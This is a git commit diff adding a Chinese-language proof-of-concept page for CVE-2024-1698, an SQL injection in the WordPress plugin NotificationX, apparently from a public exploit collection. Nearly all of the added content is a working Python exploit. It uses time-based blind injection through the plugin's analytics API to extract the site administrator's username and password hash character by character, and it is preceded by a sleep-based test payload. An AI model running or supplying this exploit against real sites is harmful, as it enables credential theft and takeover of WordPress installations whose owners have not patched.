Update WordPress插件NotificationX存在sql注入漏洞(CVE-2024-1698).md

2025-02-27 04:39:25 +00:00 · 2024-05-01 11:59:25 +08:00 · 2024-05-01 11:59:25 +08:00 · ffad9cdfaa
commit ffad9cdfaa
parent 9ce372c889
1 changed files with 79 additions and 0 deletions
--- a/WordPress插件NotificationX存在sql注入漏洞(CVE-2024-1698).md
+++ b/WordPress插件NotificationX存在sql注入漏洞(CVE-2024-1698).md
@ -13,3 +13,82 @@ Content-Type: application/json
 {"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}
 ```
 ## 利用基本
 ```python
 import requests
 import string
 from sys import exit
 # Sleep time for SQL payloads
 delay = 0.3
 # URL for the NotificationX Analytics API
 url = "http://localhost/wp-json/notificationx/v1/analytics"
 admin_username = ""
 admin_password_hash = ""
 session = requests.Session()
 # Find admin username length
 username_length = 0
 for length in range(1, 41):  # Assuming username length is less than 40 characters
    resp_length = session.post(url, data={
        "nx_id": 1337,
        "type": f"clicks`=IF(LENGTH((select user_login from wp_users where id=1))={length},SLEEP({delay}),null)-- -"
    })
    # Elapsed time > delay if delay happened due to SQLi
    if resp_length.elapsed.total_seconds() > delay:
        username_length = length
        print("Admin username length:", username_length)
        break
 # Find admin username
 for idx_username in range(1, username_length + 1):
    # Iterate over all the printable characters + NULL byte
    for ascii_val_username in (b"\x00" + string.printable.encode()):
        # Send the payload
        resp_username = session.post(url, data={
            "nx_id": 1337,
            "type": f"clicks`=IF(ASCII(SUBSTRING((select user_login from wp_users where id=1),{idx_username},1))={ascii_val_username},SLEEP({delay}),null)-- -"
        })
        # Elapsed time > delay if delay happened due to SQLi
        if resp_username.elapsed.total_seconds() > delay:
            admin_username += chr(ascii_val_username)
            # Show what we have found so far...
            print("Admin username:", admin_username)
            break  # Move to the next character
    else:
        # Null byte reached, break the outer loop
        break
 # Find admin password hash
 for idx_password in range(1, 41):  # Assuming the password hash length is less than 40 characters
    # Iterate over all the printable characters + NULL byte
    for ascii_val_password in (b"\x00" + string.printable.encode()):
        # Send the payload
        resp_password = session.post(url, data={
            "nx_id": 1337,
            "type": f"clicks`=IF(ASCII(SUBSTRING((select user_pass from wp_users where id=1),{idx_password},1))={ascii_val_password},SLEEP({delay}),null)-- -"
        })
        # Elapsed time > delay if delay happened due to SQLi
        if resp_password.elapsed.total_seconds() > delay:
            admin_password_hash += chr(ascii_val_password)
            # Show what we have found so far...
            print("Admin password hash:", admin_password_hash)
            # Exit condition - encountered a null byte
            if ascii_val_password == 0:
                print("[*] Admin credentials found:")
                print("Username:", admin_username)
                print("Password hash:", admin_password_hash)
                exit(0)
 ```
 ![image](https://github.com/wy876/POC/assets/139549762/723e8a4e-635e-4c84-ad7b-fdacb629c1ca)
 ## 来源
 - https://github.com/kamranhasan/CVE-2024-1698-Exploit